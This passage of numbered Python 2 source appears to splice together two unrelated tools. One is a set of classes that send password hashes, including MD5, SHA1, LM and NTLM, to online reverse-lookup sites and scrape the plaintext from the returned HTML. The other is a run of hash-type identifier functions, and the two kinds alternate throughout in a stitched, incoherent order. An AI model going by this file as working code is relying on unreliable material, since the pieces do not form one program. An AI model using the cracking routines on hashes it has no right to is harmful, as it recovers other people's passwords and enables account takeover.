1743.         if match:
1744.             return match.group().split('B>')[1][:-2]
1745.         else:
1746.             return None
1747.  
1748.  
1749.  
1750.  
1751. class BIGTRAPEZE:
1752.    
1753.     name =      "bigtrapeze"
1754.     url =       "http://www.bigtrapeze.com"
1755.     supported_algorithm = [MD5]
1756.    
1757.     def isSupported (self, alg):
1758.        
1759.        
1760.        
1761.         if alg in self.supported_algorithm:
1762.             return True
1763.         else:
1764.             return False
1765.  
1766.  
1767.  
1768.     def crack (self, hashvalue, alg):
1769.        
1770.        
1771.        
1772.        
1773.        
1774.         if not self.isSupported (alg):
1775.             return None
1776.        
1777.        
1778.         url = "http://www.bigtrapeze.com/md5/index.php"
1779.        
1780.        
1781.         params = { "query" : hashvalue,
1782.                " Crack " : "Enviar consulta" }
1783.                
1784.        
1785.         headers = { "User-Agent" : USER_AGENTS[randint(0, len(USER_AGENTS))-1] }
1786.  
1787.        
1788.         response = do_HTTP_request ( url, params, headers )
1789.        
1790.        
1791.         html = None
1792.         if response:
1793.             html = response.read()
1794.         else:
1795.             return None
1796.            
1797.         match = search (r'Congratulations!<li>The hash <strong>[^<]*</strong> has been deciphered to: <strong>[^<]*</strong></li>', html)
1798.        
1799.         if match:
1800.             return match.group().split('strong>')[3][:-2]
1801.         else:
1802.             return None
1803.  
1804. def Haval192HMAC():
1805.     hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
1806.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1807.         jerar.append("110080")
1808. def Tiger192():
1809.     hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
1810.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1811.         jerar.append("110020")
1812. def Tiger192HMAC():
1813.     hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
1814.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1815.         jerar.append("110060")
1816.  
1817. def MD5passsaltjoomla1():
1818.     hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
1819.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
1820.         jerar.append("112020")
1821.  
1822. def SHA1Django():
1823.     hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
1824.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
1825.         jerar.append("113020")
1826.  
1827. def Haval224():
1828.     hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
1829.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1830.         jerar.append("114040")
1831. def Haval224HMAC():
1832.     hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
1833.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1834.         jerar.append("114080")
1835. def SHA224():
1836.     hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
1837.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1838.         jerar.append("114020")
1839. def SHA224HMAC():
1840.     hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
1841.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1842.         jerar.append("114060")
1843.  
1844. class HASHCHECKER:
1845.    
1846.     name =      "hashchecker"
1847.     url =       "http://www.hashchecker.com"
1848.     supported_algorithm = [MD5]
1849.    
1850.     def isSupported (self, alg):
1851.        
1852.        
1853.        
1854.         if alg in self.supported_algorithm:
1855.             return True
1856.         else:
1857.             return False
1858.  
1859.  
1860.  
1861.     def crack (self, hashvalue, alg):
1862.        
1863.        
1864.        
1865.        
1866.        
1867.         if not self.isSupported (alg):
1868.             return None
1869.        
1870.        
1871.         url = "http://www.hashchecker.com/index.php"
1872.        
1873.        
1874.         params = { "search_field" : hashvalue,
1875.                "Submit" : "search" }
1876.                
1877.        
1878.         response = do_HTTP_request ( url, params )
1879.        
1880.        
1881.         html = None
1882.         if response:
1883.             html = response.read()
1884.         else:
1885.             return None
1886.            
1887.         match = search (r'<td><li>Your md5 hash is :<br><li>[^\s]* is <b>[^<]*</b> used charlist :2</td>', html)
1888.        
1889.         if match:
1890.             return match.group().split('b>')[1][:-2]
1891.         else:
1892.             return None
1893.  
1894.  
1895.  
1896. class MD5HASHCRACKER:
1897.    
1898.     name =      "md5hashcracker"
1899.     url =       "http://md5hashcracker.appspot.com"
1900.     supported_algorithm = [MD5]
1901.    
1902.     def isSupported (self, alg):
1903.        
1904.        
1905.        
1906.         if alg in self.supported_algorithm:
1907.             return True
1908.         else:
1909.             return False
1910.  
1911.  
1912.  
1913.     def crack (self, hashvalue, alg):
1914.        
1915.        
1916.        
1917.        
1918.        
1919.         if not self.isSupported (alg):
1920.             return None
1921.        
1922.        
1923.         url = "http://md5hashcracker.appspot.com/crack"
1924.        
1925.        
1926.         params = { "query" : hashvalue,
1927.                "submit" : "Crack" }
1928.        
1929.         response = do_HTTP_request ( url, params )
1930.        
1931.         url = "http://md5hashcracker.appspot.com/status"
1932.        
1933.         response = do_HTTP_request ( url )
1934.        
1935.        
1936.         if response:
1937.             html = response.read()
1938.         else:
1939.             return None
1940.         match = search (r'<td id="cra[^"]*">not cracked</td>', html)
1941.        
1942.         if not match:
1943.             match = search (r'<td id="cra[^"]*">cracked</td>', html)
1944.             regexp = r'<td id="pla_' + match.group().split('"')[1][4:] + '">[^<]*</td>'
1945.             match2 = search (regexp, html)
1946.             if match2:
1947.                 return match2.group().split('>')[1][:-4]
1948.            
1949.         else:
1950.             return None
1951.  
1952.  
1953.  
1954. class PASSCRACKING:
1955.    
1956.     name =      "passcracking"
1957.     url =       "http://passcracking.com"
1958.     supported_algorithm = [MD5]
1959.    
1960.     def isSupported (self, alg):
1961.        
1962.        
1963.        
1964.         if alg in self.supported_algorithm:
1965.             return True
1966.         else:
1967.             return False
1968.  
1969.  
1970.  
1971.     def crack (self, hashvalue, alg):
1972.        
1973.        
1974.        
1975.        
1976.        
1977.         if not self.isSupported (alg):
1978.             return None
1979.        
1980.          
1981.         url = "http://passcracking.com/index.php"
1982.        
1983.        
1984.         boundary = "-----------------------------" + str(randint(1000000000000000000000000000,9999999999999999999999999999))
1985.         params = [ '--' + boundary,
1986.                'Content-Disposition: form-data; name="admin"',
1987.                '',
1988.                'false',
1989.                
1990.                '--' + boundary,
1991.                'Content-Disposition: form-data; name="admin2"',
1992.                '',
1993.                '77.php',
1994.                
1995.                '--' + boundary,
1996.                'Content-Disposition: form-data; name="datafromuser"',
1997.                '',
1998.                '%s' % (hashvalue) ,
1999.                
2000.                '--' + boundary + '--', '' ]
2001.         body = '\r\n'.join(params)
2002.  
2003.         headers = { "Content-Type" : "multipart/form-data; boundary=%s" % (boundary),
2004.                     "Content-length" : len(body) }
2005.        
2006.                
2007.        
2008.         request = urllib2.Request ( url )
2009.         request.add_header ( "Content-Type", "multipart/form-data; boundary=%s" % (boundary) )
2010.         request.add_header ( "Content-length", len(body) )
2011.         request.add_data(body)
2012.         try:
2013.             response = urllib2.urlopen(request)
2014.         except:
2015.             return None
2016.        
2017.        
2018.         html = None
2019.         if response:
2020.             html = response.read()
2021.         else:
2022.             return None
2023.            
2024.         match = search (r'<td>md5 Database</td><td>[^<]*</td><td bgcolor=.FF0000>[^<]*</td>', html)
2025.        
2026.         if match:
2027.             return match.group().split('>')[5][:-4]
2028.         else:
2029.             return None
2030.  
2031. def sha1usernamepass():
2032.     hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
2033.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2034.         jerar.append("109380")
2035. def sha1usernamepasssalt():
2036.     hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
2037.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2038.         jerar.append("109400")
2039. def sha1md5pass():
2040.     hs='fa960056c0dea57de94776d3759fb555a15cae87'
2041.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2042.         jerar.append("1094202")
2043. def sha1md5passsalt():
2044.     hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
2045.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2046.         jerar.append("109440")
2047. def sha1md5sha1pass():
2048.     hs='8bceaeed74c17571c15cdb9494e992db3c263695'
2049.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2050.         jerar.append("109460")
2051. def sha1sha1pass():
2052.     hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
2053.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2054.         jerar.append("109480")
2055. def sha1sha1passsalt():
2056.     hs='780d43fa11693b61875321b6b54905ee488d7760'
2057.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2058.         jerar.append("109500")
2059. def sha1sha1passsubstrpass03():
2060.     hs='5ed6bc680b59c580db4a38df307bd4621759324e'
2061.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2062.         jerar.append("109520")
2063. def sha1sha1saltpass():
2064.     hs='70506bac605485b4143ca114cbd4a3580d76a413'
2065.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2066.         jerar.append("109540")
2067. def sha1sha1sha1pass():
2068.     hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
2069.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2070.         jerar.append("109560")
2071. def sha1strtolowerusernamepass():
2072.     hs='79f575543061e158c2da3799f999eb7c95261f07'
2073.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2074.         jerar.append("109580")
2075.  
2076. def Haval192():
2077.     hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
2078.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2079.         jerar.append("110040")
2080.  
2081. class ASKCHECK:
2082.    
2083.     name =      "askcheck"
2084.     url =       "http://askcheck.com"
2085.     supported_algorithm = [MD4, MD5, SHA1, SHA256]
2086.    
2087.     def isSupported (self, alg):
2088.        
2089.        
2090.        
2091.         if alg in self.supported_algorithm:
2092.             return True
2093.         else:
2094.             return False
2095.  
2096.  
2097.  
2098.     def crack (self, hashvalue, alg):
2099.        
2100.        
2101.        
2102.        
2103.        
2104.         if not self.isSupported (alg):
2105.             return None
2106.        
2107.        
2108.         url = "http://askcheck.com/reverse?reverse=%s" % (hashvalue)
2109.        
2110.        
2111.         response = do_HTTP_request ( url )
2112.        
2113.        
2114.         html = None
2115.         if response:
2116.             html = response.read()
2117.         else:
2118.             return None
2119.            
2120.         match = search (r'Reverse value of [^\s]* hash <a[^<]*</a> is <a[^>]*>[^<]*</a>', html)
2121.        
2122.         if match:
2123.             return match.group().split('>')[3][:-3]
2124.         else:
2125.             return None
2126.  
2127.  
2128.  
2129. class FOX21:
2130.    
2131.     name =      "fox21"
2132.     url =       "http://cracker.fox21.at"
2133.     supported_algorithm = [MD5, LM, NTLM]
2134.    
2135.     def isSupported (self, alg):
2136.        
2137.        
2138.        
2139.         if alg in self.supported_algorithm:
2140.             return True
2141.         else:
2142.             return False
2143.  
2144.  
2145.  
2146.     def crack (self, hashvalue, alg):
2147.        
2148.        
2149.        
2150.        
2151.        
2152.         if not self.isSupported (alg):
2153.             return None
2154.        
2155.         hash2 = None
2156.         if alg in [LM, NTLM] and ':' in hashvalue:
2157.             if alg == LM:
2158.                 hash2 = hashvalue.split(':')[0]
2159.             else:
2160.                 hash2 = hashvalue.split(':')[1]
2161.         else:
2162.             hash2 = hashvalue
2163.        
2164.        
2165.        
2166.         url = "http://cracker.fox21.at/api.php?a=check&h=%s" % (hashvalue)
2167.        
2168.        
2169.         response = do_HTTP_request ( url )
2170.        
2171.        
2172.         xml = None
2173.         if response:
2174.             try:
2175.                 doc = parseDoc ( response.read() )
2176.             except:
2177.                 print "INFO: You need libxml2 to use this plugin."
2178.                 return None
2179.         else:
2180.             return None
2181.        
2182.         result = doc.xpathEval("//hash/@plaintext")
2183.        
2184.         if result:
2185.             return result[0].content
2186.         else:
2187.             return None
2188.  
2189. def SHA1MaNGOS():
2190.     hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
2191.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2192.         jerar.append("109220")
2193. def SHA1MaNGOS2():
2194.     hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
2195.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2196.         jerar.append("109240")
2197. def Tiger160():
2198.     hs='c086184486ec6388ff81ec9f235287270429b225'
2199.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2200.         jerar.append("109080")
2201. def Tiger160HMAC():
2202.     hs='6603161719da5e56e1866e4f61f79496334e6a10'
2203.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2204.         jerar.append("109160")
2205. def sha1passsalt():
2206.     hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
2207.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2208.         jerar.append("109260")
2209. def sha1saltpass():
2210.     hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
2211.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2212.         jerar.append("109280")
2213. def sha1saltmd5pass():
2214.     hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
2215.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2216.         jerar.append("109300")
2217. def sha1saltmd5passsalt():
2218.     hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
2219.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2220.         jerar.append("109320")
2221. def sha1saltsha1pass():
2222.     hs='58714327f9407097c64032a2fd5bff3a260cb85f'
2223.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2224.         jerar.append("109340")
2225. def sha1saltsha1saltsha1pass():
2226.     hs='cc600a2903130c945aa178396910135cc7f93c63'
2227.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2228.         jerar.append("109360")
2229.  
2230.            
2231. class NICENAMECREW:
2232.    
2233.     name =      "nicenamecrew"
2234.     url =       "http://crackfoo.nicenamecrew.com"
2235.     supported_algorithm = [MD5, SHA1, LM]
2236.    
2237.     def isSupported (self, alg):
2238.        
2239.        
2240.        
2241.         if alg in self.supported_algorithm:
2242.             return True
2243.         else:
2244.             return False
2245.  
2246.  
2247.  
2248.     def crack (self, hashvalue, alg):
2249.        
2250.        
2251.        
2252.        
2253.        
2254.         if not self.isSupported (alg):
2255.             return None
2256.        
2257.         hash2 = None
2258.         if alg in [LM] and ':' in hashvalue:
2259.             hash2 = hashvalue.split(':')[0]
2260.         else:
2261.             hash2 = hashvalue
2262.            
2263.        
2264.         url = "http://crackfoo.nicenamecrew.com/?t=%s" % (alg)
2265.        
2266.        
2267.         params = { "q" : hash2,
2268.                "sa" : "Crack" }
2269.                
2270.        
2271.         response = do_HTTP_request ( url, params )
2272.        
2273.        
2274.         html = None
2275.         if response:
2276.             html = response.read()
2277.         else:
2278.             return None
2279.        
2280.         match = search (r'The decrypted version of [^\s]* is:<br><strong>[^<]*</strong>', html)
2281.        
2282.         if match:
2283.             return match.group().split('strong>')[1][:-2].strip()
2284.         else:
2285.             return None
2286.  
2287.  
2288. def MD5APR():
2289.     hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
2290.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
2291.         jerar.append("108020")
2292.  
2293. def Haval160():
2294.     hs='a106e921284dd69dad06192a4411ec32fce83dbb'
2295.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2296.         jerar.append("109100")
2297. def Haval160HMAC():
2298.     hs='29206f83edc1d6c3f680ff11276ec20642881243'
2299.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2300.         jerar.append("109200")
2301. def MySQL5():
2302.     hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
2303.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2304.         jerar.append("109040")
2305. def MySQL160bit():
2306.     hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
2307.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
2308.         jerar.append("109060")
2309. def RipeMD160():
2310.     hs='dc65552812c66997ea7320ddfb51f5625d74721b'
2311.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2312.         jerar.append("109120")
2313. def RipeMD160HMAC():
2314.     hs='ca28af47653b4f21e96c1235984cb50229331359'
2315.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2316.         jerar.append("109180")
2317. def SHA1():
2318.     hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
2319.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2320.         jerar.append("109020")
2321. def SHA1HMAC():
2322.     hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
2323.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2324.         jerar.append("109140")
2325.  
2326.  
2327. class JOOMLAAA:
2328.    
2329.     name =      "joomlaaa"
2330.     url =       "http://joomlaaa.com"
2331.     supported_algorithm = [MD5]
2332.    
2333.     def isSupported (self, alg):
2334.        
2335.        
2336.        
2337.         if alg in self.supported_algorithm:
2338.             return True
2339.         else:
2340.             return False
2341.  
2342.  
2343.  
2344.     def crack (self, hashvalue, alg):
2345.        
2346.        
2347.        
2348.        
2349.        
2350.         if not self.isSupported (alg):
2351.             return None
2352.        
2353.        
2354.         url = "http://joomlaaa.com/component/option,com_md5/Itemid,31/"
2355.        
2356.        
2357.         params = { "md5" : hashvalue,
2358.                "decode" : "Submit" }
2359.                
2360.        
2361.         response = do_HTTP_request ( url, params )
2362.        
2363.        
2364.         html = None
2365.         if response:
2366.             html = response.read()
2367.         else:
2368.             return None
2369.        
2370.         match = search (r"<td class='title1'>not available</td>", html)
2371.        
2372.         if not match:
2373.             match2 = findall (r"<td class='title1'>[^<]*</td>", html)
2374.             return match2[1].split('>')[1][:-4]
2375.         else:
2376.             return None
2377.  
2378.  
2379.  
2380. class MD5_LOOKUP:
2381.    
2382.     name =      "md5-lookup"
2383.     url =       "http://md5-lookup.com"
2384.     supported_algorithm = [MD5]
2385.    
2386.     def isSupported (self, alg):
2387.        
2388.        
2389.        
2390.         if alg in self.supported_algorithm:
2391.             return True
2392.         else:
2393.             return False
2394.  
2395.  
2396.  
2397.     def crack (self, hashvalue, alg):
2398.        
2399.        
2400.        
2401.        
2402.        
2403.         if not self.isSupported (alg):
2404.             return None
2405.        
2406.        
2407.         url = "http://md5-lookup.com/livesearch.php?q=%s" % (hashvalue)
2408.        
2409.        
2410.         response = do_HTTP_request ( url )
2411.        
2412.        
2413.         html = None
2414.         if response:
2415.             html = response.read()
2416.         else:
2417.             return None
2418.        
2419.         match = search (r'<td width="250">[^<]*</td>', html)
2420.        
2421.         if match:
2422.             return match.group().split('>')[1][:-4]
2423.         else:
2424.             return None
2425.  
2426.  
2427. def md5md5md5md5md5pass():
2428.     hs='4548d2c062933dff53928fd4ae427fc0'
2429.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2430.         jerar.append("106660")
2431. def md5sha1pass():
2432.     hs='cb4ebaaedfd536d965c452d9569a6b1e'
2433.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2434.         jerar.append("106680")
2435. def md5sha1md5pass():
2436.     hs='099b8a59795e07c334a696a10c0ebce0'
2437.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2438.         jerar.append("106700")
2439. def md5sha1md5sha1pass():
2440.     hs='06e4af76833da7cc138d90602ef80070'
2441.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2442.         jerar.append("106720")
2443. def md5strtouppermd5pass():
2444.     hs='519de146f1a658ab5e5e2aa9b7d2eec8'
2445.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2446.         jerar.append("106740")
2447.  
2448. def LineageIIC4():
2449.     hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
2450.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
2451.         jerar.append("107080")
2452. def MD5phpBB3():
2453.     hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
2454.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
2455.         jerar.append("107040")
2456. def MD5Unix():
2457.     hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
2458.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
2459.         jerar.append("107060")
2460. def MD5Wordpress():
2461.     hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
2462.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
2463.         jerar.append("107020")
2464.  
2465.  
2466.  
2467. class SHA1_LOOKUP:
2468.    
2469.     name =      "sha1-lookup"
2470.     url =       "http://sha1-lookup.com"
2471.     supported_algorithm = [SHA1]
2472.    
2473.     def isSupported (self, alg):
2474.        
2475.        
2476.        
2477.         if alg in self.supported_algorithm:
2478.             return True
2479.         else:
2480.             return False
2481.  
2482.  
2483.  
2484.     def crack (self, hashvalue, alg):
2485.        
2486.        
2487.        
2488.        
2489.        
2490.         if not self.isSupported (alg):
2491.             return None
2492.        
2493.        
2494.         url = "http://sha1-lookup.com/livesearch.php?q=%s" % (hashvalue)
2495.        
2496.        
2497.         response = do_HTTP_request ( url )
2498.        
2499.        
2500.         html = None
2501.         if response:
2502.             html = response.read()
2503.         else:
2504.             return None
2505.        
2506.         match = search (r'<td width="250">[^<]*</td>', html)
2507.        
2508.         if match:
2509.             return match.group().split('>')[1][:-4]
2510.         else:
2511.             return None
2512.  
2513.  
2514. class SHA256_LOOKUP:
2515.    
2516.     name =      "sha256-lookup"
2517.     url =       "http://sha-256.sha1-lookup.com"
2518.     supported_algorithm = [SHA256]
2519.    
2520.     def isSupported (self, alg):
2521.        
2522.        
2523.        
2524.         if alg in self.supported_algorithm:
2525.             return True
2526.         else:
2527.             return False
2528.  
2529.  
2530.  
2531.     def crack (self, hashvalue, alg):
2532.        
2533.        
2534.        
2535.        
2536.        
2537.         if not self.isSupported (alg):
2538.             return None
2539.        
2540.        
2541.         url = "http://sha-256.sha1-lookup.com/livesearch.php?q=%s" % (hashvalue)
2542.        
2543.        
2544.         response = do_HTTP_request ( url )
2545.        
2546.        
2547.         html = None
2548.         if response:
2549.             html = response.read()
2550.         else:
2551.             return None
2552.        
2553.         match = search (r'<td width="250">[^<]*</td>', html)
2554.        
2555.         if match:
2556.             return match.group().split('>')[1][:-4]
2557.         else:
2558.             return None
2559.  
2560.  
2561.  
2562. class RIPEMD160_LOOKUP:
2563.    
2564.     name =      "ripemd-lookup"
2565.     url =       "http://www.ripemd-lookup.com"
2566.     supported_algorithm = [RIPEMD]
2567.    
2568.     def isSupported (self, alg):
2569.        
2570.        
2571.        
2572.         if alg in self.supported_algorithm:
2573.             return True
2574.         else:
2575.             return False
2576.  
2577.  
2578.  
2579.     def crack (self, hashvalue, alg):
2580.        
2581.        
2582.        
2583.        
2584.        
2585.         if not self.isSupported (alg):
2586.             return None
2587.        
2588.        
2589.         url = "http://www.ripemd-lookup.com/livesearch.php?q=%s" % (hashvalue)
2590.        
2591.        
2592.         response = do_HTTP_request ( url )
2593.        
2594.        
2595.         html = None
2596.         if response:
2597.             html = response.read()
2598.         else:
2599.             return None
2600.        
2601.         match = search (r'<td width="250">[^<]*</td>', html)
2602.        
2603.         if match:
2604.             return match.group().split('>')[1][:-4]
2605.         else:
2606.             return None
2607.  
2608.  
2609.  
2610. class MD5_COM_CN:
2611.    
2612.     name =      "md5.com.cn"
2613.     url =       "http://md5.com.cn"
2614.     supported_algorithm = [MD5]
2615.    
2616.     def isSupported (self, alg):
2617.        
2618.        
2619.        
2620.         if alg in self.supported_algorithm:
2621.             return True
2622.         else:
2623.             return False
2624.  
2625.  
2626.  
2627.     def crack (self, hashvalue, alg):
2628.        
2629.        
2630.        
2631.        
2632.        
2633.         if not self.isSupported (alg):
2634.             return None
2635.        
2636.        
2637.         url = "http://md5.com.cn/md5reverse"
2638.        
2639.        
2640.         params = { "md" : hashvalue,
2641.                "submit" : "MD5 Crack" }
2642.        
2643.        
2644.         response = do_HTTP_request ( url, params )
2645.        
2646.        
2647.         html = None
2648.         if response:
2649.             html = response.read()
2650.         else:
2651.             return None
2652.        
2653.         match = search (r'<b style="color:red;">[^<]*</b><br/><span', html)
2654.        
2655.         if match:
2656.             return match.group().split('>')[1][:-3]
2657.         else:
2658.             return None
2659.  
2660.  
2661.  
2662.  
2663. def md5md5pass():
2664.     hs='a96103d267d024583d5565436e52dfb3'
2665.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2666.         jerar.append("106500")
2667. def md5md5passsalt():
2668.     hs='5848c73c2482d3c2c7b6af134ed8dd89'
2669.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2670.         jerar.append("106520")
2671. def md5md5passmd5salt():
2672.     hs='8dc71ef37197b2edba02d48c30217b32'
2673.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2674.         jerar.append("106540")
2675. def md5md5saltpass():
2676.     hs='9032fabd905e273b9ceb1e124631bd67'
2677.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2678.         jerar.append("106560")
2679. def md5md5saltmd5pass():
2680.     hs='8966f37dbb4aca377a71a9d3d09cd1ac'
2681.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2682.         jerar.append("106580")
2683. def md5md5usernamepasssalt():
2684.     hs='4319a3befce729b34c3105dbc29d0c40'
2685.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2686.         jerar.append("106600")
2687. def md5md5md5pass():
2688.     hs='ea086739755920e732d0f4d8c1b6ad8d'
2689.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2690.         jerar.append("106620")
2691. def md5md5md5md5pass():
2692.     hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
2693.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
2694.         jerar.append("106640")
2695.  
2696.            
2697. class DIGITALSUN:
2698.    
2699.     name =      "digitalsun.pl"
2700.     url =       "http://md5.digitalsun.pl"
2701.     supported_algorithm = [MD5]
2702.    
2703.     def isSupported (self, alg):
2704.        
2705.        
2706.        
2707.         if alg in self.supported_algorithm:
2708.             return True
2709.         else:
2710.             return False
2711.  
2712.  
2713.  
2714.     def crack (self, hashvalue, alg):
2715.        
2716.        
2717.        
2718.        
2719.        
2720.         if not self.isSupported (alg):
2721.             return None
2722.        
2723.        
2724.         url = "http://md5.digitalsun.pl/"
2725.        
2726.        
2727.         params = { "hash" : hashvalue }
2728.        
2729.        
2730.         response = do_HTTP_request ( url, params )
2731.        
2732.        
2733.         html = None
2734.         if response:
2735.             html = response.read()
2736.         else:
2737.             return None
2738.        
2739.         match = search (r'<b>[^<]*</b> == [^<]*<br>\s*<br>', html)
2740.        
2741.         if match:
2742.             return match.group().split('b>')[1][:-2]
2743.         else:
2744.             return None
2745.  
2746.  
2747.  
2748. class DRASEN:
2749.    
2750.     name =      "drasen.net"
2751.     url =       "http://md5.drasen.net"
2752.     supported_algorithm = [MD5]
2753.    
2754.     def isSupported (self, alg):
2755.        
2756.        
2757.        
2758.         if alg in self.supported_algorithm:
2759.             return True
2760.         else:
2761.             return False
2762.  
2763.  
2764.  
2765.     def crack (self, hashvalue, alg):
2766.        
2767.        
2768.        
2769.        
2770.        
2771.         if not self.isSupported (alg):
2772.             return None
2773.        
2774.        
2775.         url = "http://md5.drasen.net/search.php?query=%s" % (hashvalue)
2776.        
2777.        
2778.         response = do_HTTP_request ( url )
2779.        
2780.        
2781.         html = None
2782.         if response:
2783.             html = response.read()
2784.         else:
